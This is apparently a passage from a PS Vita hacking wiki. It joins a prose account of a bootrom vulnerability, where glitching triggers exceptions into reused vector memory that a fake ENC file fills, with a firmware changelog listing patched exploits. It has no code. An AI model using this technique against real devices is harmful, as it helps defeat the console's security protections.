(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code>, the uncached alias of <code>0x800000</code> (both are F00D-only private memory), and only later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are considered stale, so the memory is reused as the load buffer. Interrupts are disabled, so they cannot be used to reach the vectors. Exceptions, however, cannot be disabled in hardware; the reuse is only safe because there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe). The table below summarises each exception and why it cannot be triggered.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table whose entries all point to our payload, we can execute F00D code at bootrom time (before the bootrom is unmapped). This is a very desirable glitching target because it requires almost no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style glitch attacks. In practice, we found this target to have an extremely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because the read is done in whole eMMC blocks. The second path is used in early boot to read the [[Secure Kernel]] ENC, which is loaded from the [[SLB2]] partition by the ARM TZ processor into volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=11407System Software2019-08-27T11:19:40Z<p>Xyz: /* Version 3 */</p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists have been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and a ton of other vulns.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
[Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several game exploits (Fieldrunners and others, some of them undisclosed) were fixed, preventing the use of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various known exploit titles were fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles were fixed as well.<br />
* Internal firmware changes now prevent exploits in PSP Minis that lack network functions from executing larger payloads (e.g. TN-V/ARK eCFW).<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* Full array of languages has been added to [External Keyboard] settings (previously was Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/JavaScript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
